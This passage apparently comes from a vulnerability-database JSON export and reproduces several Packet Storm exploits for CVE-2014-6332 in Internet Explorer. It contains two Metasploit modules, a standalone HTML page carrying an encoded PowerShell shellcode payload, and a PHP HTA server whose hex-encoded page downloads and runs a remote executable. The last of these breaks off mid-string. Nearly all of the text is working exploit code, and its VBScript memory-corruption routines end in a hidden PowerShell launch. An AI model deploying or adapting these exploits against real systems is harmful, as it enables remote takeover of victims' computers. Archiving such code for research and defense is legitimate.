"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:11:55", "description": "", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "packetstorm", "title": "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-30T00:00:00", "id": "PACKETSTORM:129326", "href": "https://packetstormsecurity.com/files/129326/Microsoft-Internet-Explorer-Windows-OLE-Automation-Array-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n \nrequire 'msf/core' \nrequire 'msf/core/exploit/powershell' \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \ninclude Msf::Exploit::Remote::BrowserAutopwn \ninclude Msf::Exploit::Powershell \n \nautopwn_info({ \n:ua_name => HttpClients::IE, \n:ua_minver => \"3.0\", \n:ua_maxver => \"10.0\", \n:javascript => true, \n:os_name => OperatingSystems::Match::WINDOWS, \n:rank => ExcellentRanking \n}) \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution\", \n'Description' => %q{ \nThis module exploits Windows OLE Automation Array Vulnerability known as CVE-2014-6332. \nThe vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10. \nPowershell is required on the target machine. On Internet Explorer versions using Protected Mode, \nthe user has to manually allow powershell.exe to execute in order to be compromised. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Robert Freeman', # IBM X-Force \n'yuange', # twitter.com/yuange75 \n'Rik van Duijn', # twitter.com/rikvduijn \n'Wesley Neelen', # security[at]forsec.nl \n'GradiusX <francescomifsud[at]gmail.com>', \n'b33f', # @FuzzySec \n], \n'References' => \n[ \n[ 'CVE', '2014-6332' ], \n[ 'MSB', 'MS14-064' ], \n[ 'OSVDB', '114533' ], \n[ 'EDB', '35229' ], \n[ 'EDB', '35308' ], \n[ 'URL', 'http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows' ], \n[ 'URL', 'https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module' ] \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows x86', { 'Arch' => ARCH_X86 } ], \n], \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:ua_name => HttpClients::IE, \n:os_name => /win/i, \n:arch => 'x86', \n:ua_ver => lambda { |ver| ver.to_i.between?(4, 10) } \n}, \n'DefaultOptions' => \n{ \n'HTTP::compression' => 'gzip' \n}, \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'Privileged' => false, \n'DisclosureDate' => \"Nov 13 2014\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]), \n], self.class ) \n \nend \n \ndef vbs_prepare() \ncode = %Q| \ndim aa() \ndim ab() \ndim a0 \ndim a1 \ndim a2 \ndim a3 \ndim win9x \ndim intVersion \ndim rnda \ndim funclass \ndim myarray \n \nBegin() \n \nneline \nfunction Begin() \nOn Error Resume Next \ninfo=Navigator.UserAgent \n \nif(instr(info,\"Win64\")>0) then \nexit function \nend if \n \nif (instr(info,\"MSIE\")>0) then \nintVersion = CInt(Mid(info, InStr(info, \"MSIE\") + 5, 2)) \nelse \nexit function \n \nend if \n \nwin9x=0 \n \nBeginInit() \nIf Create()=True Then \nmyarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) \nmyarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) \n \nif(intVersion<4) then \ndocument.write(\"<br> IE\") \ndocument.write(intVersion) \nrunshellcode() \nelse \nsetnotsafemode() \nend if \nend if \nend function \n \nfunction BeginInit() \nRandomize() \nredim aa(5) \nredim ab(5) \na0=13+17*rnd(6) \na3=7+3*rnd(5) \nend function \n \nfunction Create() \nOn Error Resume Next \ndim i \nCreate=False \nFor i = 0 To 400 \nIf Over()=True Then \n' document.write(i) \nCreate=True \nExit For \nEnd If \nNext \nend function \n \nsub testaa() \nend sub \n \nfunction mydata() \nOn Error Resume Next \ni=testaa \ni=null \nredim Preserve aa(a2) \n \nab(0)=0 \naa(a1)=i \nab(0)=6.36598737437801E-314 \n \naa(a1+2)=myarray \nab(2)=1.74088534731324E-310 \nmydata=aa(a1) \nredim Preserve aa(a0) \nend function \n \nfunction setnotsafemode() \nOn Error Resume Next \ni=mydata() \ni=readmemo(i+8) \ni=readmemo(i+16) \nj=readmemo(i+&h134) \nfor k=0 to &h60 step 4 \nj=readmemo(i+&h120+k) \nif(j=14) then \nj=0 \nredim Preserve aa(a2) \naa(a1+2)(i+&h11c+k)=ab(4) \nredim Preserve aa(a0) \n \nj=0 \nj=readmemo(i+&h120+k) \n \nExit for \nend if \n \nnext \nab(2)=1.69759663316747E-313 \nrunaaaa() \nend function \n \nfunction Over() \nOn Error Resume Next \ndim type1,type2,type3 \nOver=False \na0=a0+a3 \na1=a0+2 \na2=a0+&h8000000 \n \nredim Preserve aa(a0) \nredim ab(a0) \n \nredim Preserve aa(a2) \n \ntype1=1 \nab(0)=1.123456789012345678901234567890 \naa(a0)=10 \n \nIf(IsObject(aa(a1-1)) = False) Then \nif(intVersion<4) then \nmem=cint(a0+1)*16 \nj=vartype(aa(a1-1)) \nif((j=mem+4) or (j*8=mem+8)) then \nif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then \ntype1=VarType(aa(a1)) \nend if \nend if \nelse \nredim Preserve aa(a0) \nexit function \n \nend if \nelse \nif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then \ntype1=VarType(aa(a1)) \nend if \nend if \nend if \nend if \n \n \nIf(type1=&h2f66) Then \nOver=True \nEnd If \nIf(type1=&hB9AD) Then \nOver=True \nwin9x=1 \nEnd If \n \nredim Preserve aa(a0) \n \nend function \n \nfunction ReadMemo(add) \nOn Error Resume Next \nredim Preserve aa(a2) \n \nab(0)=0 \naa(a1)=add+4 \nab(0)=1.69759663316747E-313 \nReadMemo=lenb(aa(a1)) \n \nab(0)=0 \n \nredim Preserve aa(a0) \nend function \n \n| \n \nend \n \ndef get_html() \n \nif datastore['TRYUAC'] \ntryuac = 'runas' \nelse \ntryuac = 'open' \nend \n \npayl = cmd_psh_payload(payload.encoded,\"x86\",{ :remove_comspec => true }) \npayl.slice! \"powershell.exe \" \nprep = vbs_prepare() \n \nhtml = %Q| \n<!doctype html> \n<html> \n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=EmulateIE8\" > \n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" /> \n<body> \n<script language=\"VBScript\"> \nfunction runaaaa() \nOn Error Resume Next \n \nset shell=createobject(\"Shell.Application\") \nshell.ShellExecute \"powershell.exe\", \"#{payl}\", \"\", \"#{tryuac}\", 0 \n \nend function \n</script> \n<script language=\"VBScript\"> \n#{prep} \n</script> \n</body> \n</html> \n| \n \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Requesting: #{request.uri}\") \nsend_exploit_html(cli, get_html()) \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129326/ms14_064_ole_code_execution.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:13:34", "description": "", "cvss3": {}, "published": "2014-11-13T00:00:00", "type": "packetstorm", "title": "Windows OLE Automation Array Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-13T00:00:00", "id": "PACKETSTORM:129100", "href": "https://packetstormsecurity.com/files/129100/Windows-OLE-Automation-Array-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'msf/core/exploit/powershell' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Powershell \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Windows OLE Automation Array Remote Code Execution\", \n'Description' => %q{ \nThis modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability. \nInternet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'IBM', # Discovery \n'yuange <twitter.com/yuange75>', # PoC \n'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit \n'Wesley Neelen <security[at]forsec.nl>' #Metasploit \n], \n'References' => \n[ \n[ 'CVE', '2014-6332' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n}, \n'DefaultOptions' => \n{ \n'EXITFUNC' => \"none\" \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => \"November 12 2014\", \n'DefaultTarget' => 0)) \nend \n \ndef on_request_uri(cli, request) \npayl = cmd_psh_payload(payload.encoded,\"x86\",{ :remove_comspec => true }) \npayl.slice! \"powershell.exe \" \n \nhtml = <<-EOS \n<!doctype html> \n \n<html> \n \n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=EmulateIE8\" > \n \n<head> \n \n</head> \n \n<body> \n \n \n<SCRIPT LANGUAGE=\"VBScript\"> \n \n \nfunction trigger() \n \nOn Error Resume Next \n \nset shell=createobject(\"Shell.Application\") \n \nshell.ShellExecute \"powershell.exe\", \"#{payl}\", \"\", \"open\", 1 \n \nend function \n \n \n</script> \n \n \n<SCRIPT LANGUAGE=\"VBScript\"> \n \n \n \ndim aa() \n \ndim ab() \n \ndim a0 \n \ndim a1 \n \ndim a2 \n \ndim a3 \n \ndim win9x \n \ndim intVersion \n \ndim rnda \n \ndim funclass \n \ndim myarray \n \n \nBegin() \n \n \nfunction Begin() \n \nOn Error Resume Next \n \ninfo=Navigator.UserAgent \n \n \nif(instr(info,\"Win64\")>0) then \n \nexit function \n \nend if \n \n \nif (instr(info,\"MSIE\")>0) then \n \nintVersion = CInt(Mid(info, InStr(info, \"MSIE\") + 5, 2)) \n \nelse \n \nexit function \n \n \n \nend if \n \n \nwin9x=0 \n \n \nBeginInit() \n \nIf Create()=True Then \n \nmyarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) \n \nmyarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) \n \n \nif(intVersion<4) then \n \ndocument.write(\"<br> IE\") \n \ndocument.write(intVersion) \n \nrunshellcode() \n \nelse \n \nsetnotsafemode() \n \nend if \n \nend if \n \nend function \n \n \nfunction BeginInit() \n \nRandomize() \n \nredim aa(5) \n \nredim ab(5) \n \na0=13+17*rnd(6) \n \na3=7+3*rnd(5) \n \nend function \n \n \nfunction Create() \n \nOn Error Resume Next \n \ndim i \n \nCreate=False \n \nFor i = 0 To 400 \n \nIf Over()=True Then \n \n' document.write(i) \n \nCreate=True \n \nExit For \n \nEnd If \n \nNext \n \nend function \n \n \nsub testaa() \n \nend sub \n \n \nfunction mydata() \n \nOn Error Resume Next \n \ni=testaa \n \ni=null \n \nredim Preserve aa(a2) \n \n \n \nab(0)=0 \n \naa(a1)=i \n \nab(0)=6.36598737437801E-314 \n \n \naa(a1+2)=myarray \n \nab(2)=1.74088534731324E-310 \n \nmydata=aa(a1) \n \nredim Preserve aa(a0) \n \nend function \n \n \n \nfunction setnotsafemode() \n \nOn Error Resume Next \n \ni=mydata() \n \ni=readmemo(i+8) \n \ni=readmemo(i+16) \n \nj=readmemo(i+&h134) \n \nfor k=0 to &h60 step 4 \n \nj=readmemo(i+&h120+k) \n \nif(j=14) then \n \nj=0 \n \nredim Preserve aa(a2) \n \naa(a1+2)(i+&h11c+k)=ab(4) \n \nredim Preserve aa(a0) \n \n \nj=0 \n \nj=readmemo(i+&h120+k) \n \n \n \nExit for \n \nend if \n \n \nnext \n \nab(2)=1.69759663316747E-313 \n \ntrigger() \n \nend function \n \n \nfunction Over() \n \nOn Error Resume Next \n \ndim type1,type2,type3 \n \nOver=False \n \na0=a0+a3 \n \na1=a0+2 \n \na2=a0+&h8000000 \n \n \n \nredim Preserve aa(a0) \n \nredim ab(a0) \n \n \n \nredim Preserve aa(a2) \n \n \n \ntype1=1 \n \nab(0)=1.123456789012345678901234567890 \n \naa(a0)=10 \n \n \n \nIf(IsObject(aa(a1-1)) = False) Then \n \nif(intVersion<4) then \n \nmem=cint(a0+1)*16 \n \nj=vartype(aa(a1-1)) \n \nif((j=mem+4) or (j*8=mem+8)) then \n \nif(vartype(aa(a1-1))<>0) Then \n \nIf(IsObject(aa(a1)) = False ) Then \n \ntype1=VarType(aa(a1)) \n \nend if \n \nend if \n \nelse \n \nredim Preserve aa(a0) \n \nexit function \n \n \nend if \n \nelse \n \nif(vartype(aa(a1-1))<>0) Then \n \nIf(IsObject(aa(a1)) = False ) Then \n \ntype1=VarType(aa(a1)) \n \nend if \n \nend if \n \nend if \n \nend if \n \n \n \n \n \nIf(type1=&h2f66) Then \n \nOver=True \n \nEnd If \n \nIf(type1=&hB9AD) Then \n \nOver=True \n \nwin9x=1 \n \nEnd If \n \n \nredim Preserve aa(a0) \n \n \n \nend function \n \n \nfunction ReadMemo(add) \n \nOn Error Resume Next \n \nredim Preserve aa(a2) \n \n \n \nab(0)=0 \n \naa(a1)=add+4 \n \nab(0)=1.69759663316747E-313 \n \nReadMemo=lenb(aa(a1)) \n \n \n \nab(0)=0 \n \n \n \nredim Preserve aa(a0) \n \nend function \n \n \n</script> \n \n \n</body> \n \n</html> \nEOS \n \nprint_status(\"Sending html\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \n \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129100/ms14_064_ie_olerce.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:12:13", "description": "", "cvss3": {}, "published": "2014-11-21T00:00:00", "type": "packetstorm", "title": "Microsoft Internet Explorer OLE Pre-IE11 Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2014-11-21T00:00:00", "id": "PACKETSTORM:129210", "href": "https://packetstormsecurity.com/files/129210/Microsoft-Internet-Explorer-OLE-Pre-IE11-Code-Execution.html", "sourceData": "`<!doctype html> \n<html> \n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=EmulateIE8\" > \n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" /> \n<body> \n \n<pre> \n|--------------------------------------------------------------------------| \n| Title: OLE Automation Array Remote Code Execution => Pre IE11 | \n| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ | \n| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) | \n| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual | \n| Usage: http://www.fuzzysecurity.com/exploits/21.html | \n|--------------------------------------------------------------------------| \nVery nice black-magic yuange, don't think it went unnoticed that you \nhave been popping shells since 2009 :D \u4eba\u65e0\u5343\u65e5\u597d\uff0c\u82b1\u65e0\u767e\u65e5\u7ea2 \n|--------------------------------------------------------------------------| \n</pre> \n \n<SCRIPT LANGUAGE=\"VBScript\"> \nfunction runmumaa() \nOn Error Resume Next \nset shell=createobject(\"Shell.Application\") \n \n'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!' \npayload=\"nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw==\" \n \ncommand=\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"\"\"\"\" & chr(34) & payload & chr(34) & \"\"\"\"\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\" \n \nparams=\"-NoP -NonI -Exec Bypass -Command \" & command \n \n'Original POC yuange \n'set shell=createobject(\"Shell.Application\") \n'shell.ShellExecute \"notepad.exe\" \n \n'With UAC \n'shell.ShellExecute \"powershell\", params, \"\", \"runas\", 0 \n \n'Without UAC \nshell.ShellExecute \"powershell\", params, \"\", \"\", 0 \n \nend function \n</script> \n \n<SCRIPT LANGUAGE=\"VBScript\"> \n \ndim aa() \ndim ab() \ndim a0 \ndim a1 \ndim a2 \ndim a3 \ndim win9x \ndim intVersion \ndim rnda \ndim funclass \ndim myarray \n \nBegin() \n \nfunction Begin() \nOn Error Resume Next \ninfo=Navigator.UserAgent \n \nif(instr(info,\"Win64\")>0) then \nexit function \nend if \n \nif (instr(info,\"MSIE\")>0) then \nintVersion = CInt(Mid(info, InStr(info, \"MSIE\") + 5, 2)) \nelse \nexit function \n \nend if \n \nwin9x=0 \n \nBeginInit() \nIf Create()=True Then \nmyarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) \nmyarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) \n \nif(intVersion<4) then \ndocument.write(\"<br> IE\") \ndocument.write(intVersion) \nrunshellcode() \nelse \nsetnotsafemode() \nend if \nend if \nend function \n \nfunction BeginInit() \nRandomize() \nredim aa(5) \nredim ab(5) \na0=13+17*rnd(6) \na3=7+3*rnd(5) \nend function \n \nfunction Create() \nOn Error Resume Next \ndim i \nCreate=False \nFor i = 0 To 400 \nIf Over()=True Then \n' document.write(i) \nCreate=True \nExit For \nEnd If \nNext \nend function \n \nsub testaa() \nend sub \n \nfunction mydata() \nOn Error Resume Next \ni=testaa \ni=null \nredim Preserve aa(a2) \n \nab(0)=0 \naa(a1)=i \nab(0)=6.36598737437801E-314 \n \naa(a1+2)=myarray \nab(2)=1.74088534731324E-310 \nmydata=aa(a1) \nredim Preserve aa(a0) \nend function \n \n \nfunction setnotsafemode() \nOn Error Resume Next \ni=mydata() \ni=readmemo(i+8) \ni=readmemo(i+16) \nj=readmemo(i+&h134) \nfor k=0 to &h60 step 4 \nj=readmemo(i+&h120+k) \nif(j=14) then \nj=0 \nredim Preserve aa(a2) \naa(a1+2)(i+&h11c+k)=ab(4) \nredim Preserve aa(a0) \n \nj=0 \nj=readmemo(i+&h120+k) \n \nExit for \nend if \n \nnext \nab(2)=1.69759663316747E-313 \nrunmumaa() \nend function \n \nfunction Over() \nOn Error Resume Next \ndim type1,type2,type3 \nOver=False \na0=a0+a3 \na1=a0+2 \na2=a0+&h8000000 \n \nredim Preserve aa(a0) \nredim ab(a0) \n \nredim Preserve aa(a2) \n \ntype1=1 \nab(0)=1.123456789012345678901234567890 \naa(a0)=10 \n \nIf(IsObject(aa(a1-1)) = False) Then \nif(intVersion<4) then \nmem=cint(a0+1)*16 \nj=vartype(aa(a1-1)) \nif((j=mem+4) or (j*8=mem+8)) then \nif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then \ntype1=VarType(aa(a1)) \nend if \nend if \nelse \nredim Preserve aa(a0) \nexit function \n \nend if \nelse \nif(vartype(aa(a1-1))<>0) Then \nIf(IsObject(aa(a1)) = False ) Then \ntype1=VarType(aa(a1)) \nend if \nend if \nend if \nend if \n \n \nIf(type1=&h2f66) Then \nOver=True \nEnd If \nIf(type1=&hB9AD) Then \nOver=True \nwin9x=1 \nEnd If \n \nredim Preserve aa(a0) \n \nend function \n \nfunction ReadMemo(add) \nOn Error Resume Next \nredim Preserve aa(a2) \n \nab(0)=0 \naa(a1)=add+4 \nab(0)=1.69759663316747E-313 \nReadMemo=lenb(aa(a1)) \n \nab(0)=0 \n \nredim Preserve aa(a0) \nend function \n \n</script> \n \n</body> \n</html> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129210/ieolepreie11-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:27", "description": "", "cvss3": {}, "published": "2015-08-17T00:00:00", "type": "packetstorm", "title": "Microsoft Windows HTA Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-08-17T00:00:00", "id": "PACKETSTORM:133107", "href": "https://packetstormsecurity.com/files/133107/Microsoft-Windows-HTA-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n# Title : Microsoft Windows HTA (HTML Application) - Remote Code Execution \n# Tested on Windows 7 / Server 2008 \n# \n# \n# Author : Mohammad Reza Espargham \n# Linkedin : https://ir.linkedin.com/in/rezasp \n# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com \n# Website : www.reza.es \n# Twitter : https://twitter.com/rezesp \n# FaceBook : https://www.facebook.com/mohammadreza.espargham \n# \n# \n# MS14-064 \n# \n# \n# 1 . run php code : php hta.php \n# 2 . copy this php output (HTML) and Paste as poc.hta (Replace ip) \n# 3 . open poc.hta \n# 4 . Your Link Download/Execute on your target \n# 5 . Finished ;) \n# \n# Demo : http://youtu.be/Vkswz7vt23M \n# \n \n \n \n \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your exe link \n \n \n \nprint \" Mohammad Reza Espargham\\n\\n\\n\"; \n \n$host= gethostname(); #g3th0stn4m3 \n$ip = gethostbyname($host); #g3th0stbyn4m3 \n \nprint \"Winrar HTML Code\\n\".'<html><head><title>poc</title><META http-equiv=\"refresh\" content=\"0;URL=http://' . $ip . '\"></head></html>'.\"\\n\\n\"; \n \n$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($reza, 0,$port); \nsocket_listen($reza); \n \n$msgd = \n\"\\x3c\\x68\\x74\\x6d\\x6c\\x3e\\x0d\\x0a\\x3c\\x6d\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2d\\x65\\x71\\x75\\x69\\x76\". \n\"\\x3d\\x22\\x58\\x2d\\x55\\x41\\x2d\\x43\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x22\\x20\\x63\\x6f\\x6e\\x74\\x65\". \n\"\\x6e\\x74\\x3d\\x22\\x49\\x45\\x3d\\x45\\x6d\\x75\\x6c\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3e\\x0d\\x0a\\x3c\\x68\". \n\"\\x65\\x61\\x64\\x3e\\x0d\\x0a\\x3c\\x2f\\x68\\x65\\x61\\x64\\x3e\\x0d\\x0a\\x3c\\x62\\x6f\\x64\\x79\\x3e\\x0d\\x0a\\x20\". \n\"\\x0d\\x0a\\x3c\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4c\\x41\\x4e\\x47\\x55\\x41\\x47\\x45\\x3d\\x22\\x56\\x42\\x53\\x63\". \n\"\\x72\\x69\\x70\\x74\\x22\\x3e\\x0d\\x0a\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x72\\x75\\x6e\\x6d\\x75\". \n\"\\x6d\\x61\\x61\\x28\\x29\\x20\\x0d\\x0a\\x4f\\x6e\\x20\\x45\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\". \n\"\\x4e\\x65\\x78\\x74\\x0d\\x0a\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6c\\x6c\\x3d\\x63\\x72\\x65\\x61\\x74\\x65\\x6f\\x62\". \n\"\\x6a\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6c\\x6c\\x2e\\x41\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x22\". \n\"\\x29\\x0d\\x0a\\x63\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3d\\x22\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x2d\\x45\\x78\\x70\\x72\\x65\". \n\"\\x73\\x73\\x69\\x6f\\x6e\\x20\\x24\\x28\\x4e\\x65\\x77\\x2d\\x4f\\x62\\x6a\\x65\\x63\\x74\\x20\\x53\\x79\\x73\\x74\\x65\". \n\"\\x6d\\x2e\\x4e\\x65\\x74\\x2e\\x57\\x65\\x62\\x43\\x6c\\x69\\x65\\x6e\\x74\\x29\\x2e\\x44\\x6f\\x77\\x6e\\x6c\\x6f\\x61\". \n\"\\x64\\x46\\x69\\x6c\\x65\\x28\\x27\\x46\\x49\\x4c\\x45\\x5f\\x44\\x4f\\x57\\x4e\\x4c\\x4f\\x41\\x44\\x27\\x2c\\x27\\x6c\". \n\"\\x6f\\x61\\x64\\x2e\\x65\\x78\\x65\\x27\\x29\\x3b\\x24\\x28\\x4e\\x65\\x77\\x2d\\x4f\\x62\\x6a\\x65\\x63\\x74\\x20\\x2d\". \n\"\\x63\\x6f\\x6d\\x20\\x53\\x68\\x65\\x6c\\x6c\\x2e\\x41\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x29\\x2e\\x53\". \n\"\\x68\\x65\\x6c\\x6c\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x28\\x27\\x6c\\x6f\\x61\\x64\\x2e\\x65\\x78\\x65\\x27\\x29\\x3b\". \n\"\\x22\\x0d\\x0a\\x73\\x68\\x65\\x6c\\x6c\\x2e\\x53\\x68\\x65\\x6c\\x6c\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x20\\x22\\x70\". \n\"\\x6f\\x77\\x65\\x72\\x73\\x68\\x65\\x6c\\x6c\\x2e\\x65\\x78\\x65\\x22\\x2c\\x20\\x22\\x2d\\x43\\x6f\\x6d\\x6d\\x61\\x6e\". \n\"\\x64\\x20\\x22\\x20\\x26\\x20\\x63\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2c\\x20\\x22\\x22\\x2c\\x20\\x22\\x72\\x75\\x6e\\x61\". \n\"\\x73\\x22\\x2c\\x20\\x30\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x3c\\x2f\\x73\". \n\"\\x63\\x72\\x69\\x70\\x74\\x3e\\x0d\\x0a\\x20\\x0d\\x0a\\x3c\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4c\\x41\\x4e\\x47\\x55\". \n\"\\x41\\x47\\x45\\x3d\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3e\\x0d\\x0a\\x20\\x20\\x0d\\x0a\\x64\\x69\\x6d\". \n\"\\x20\\x20\\x20\\x61\\x61\\x28\\x29\\x0d\\x0a\\x64\\x69\\x6d\\x20\\x20\\x20\\x61\\x62\\x28\\x29\\x0d\\x0a\\x64\\x69\\x6d\". 